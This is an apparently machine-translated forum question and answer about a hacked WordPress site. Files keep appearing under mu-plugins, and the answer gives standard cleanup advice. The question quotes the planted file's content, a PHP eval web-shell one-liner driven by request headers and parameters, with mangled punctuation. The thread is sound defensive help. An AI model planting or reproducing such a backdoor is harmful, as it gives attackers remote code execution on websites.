我一直在监控我的wordpress安装,不时会在/wp-content/mu plugins/wp-nc easywp/plugin/Http/Checker/等位置创建一个文件
文件名总是以.1599…开头,后面跟着随机数例如1599674957或1599875789
此文件中的代码是<?php@eval($_HEADERS["E"](@eval($_REQUEST["E"](;
我所做的是递归地删除wordpress文件夹中的所有文件。
如何解决此问题?
感谢的帮助
您的网站被黑客入侵。这些通常被黑客插入到你的PHP文件中。您应该:
- 查找所有具有此功能的文件
- 将所有这些文件恢复到原始状态(通过从WordPress.org下载或手动修复(
- 删除任何不应该在你的WordPress中的文件
- 在WordPress上传文件夹中找到所有PHP文件并将其删除(它们不应该在那里(
- 将你的WordPress核心和所有插件更新到最新版本,以消除潜在的漏洞
通常,您应该保持定期备份。你应该经常更新你的WordPress。